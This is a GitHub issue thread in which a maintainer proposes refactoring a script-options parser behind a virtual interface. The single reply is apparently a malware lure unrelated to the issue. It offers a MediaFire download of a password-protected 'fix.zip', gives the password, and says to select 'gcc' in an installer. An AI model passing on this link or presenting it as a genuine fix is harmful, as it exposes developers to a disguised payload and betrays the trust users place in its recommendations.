### ISSUE TITLE
Refactor existing script-options parser

### ISSUE THREAD

**Issue by tomuben** [exasol/script-languages-release#950]
## Background

The existing script-options parser is tightly coupled to the Java VM implementation. As we plan to have two script-options parser implementation (See #652 ), we should prepare the code for a strategy pattern.

## Acceptance Criteria

1. Move the code (https://github.com/exasol/script-languages/blob/master/exaudfclient/base/exaudflib/vm/scriptoptionlines.h and https://github.com/exasol/script-languages/blob/master/exaudfclient/base/exaudflib/vm/scriptoptionlines.cc) from `exaudflib` (as it actually is called directly from the VM's) to it's own subdirectory
2. Extract the option line specific code into a separate class
3. Encapsulate the invocation of the parser (`scriptoptionlines`) behind a virtual interface

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
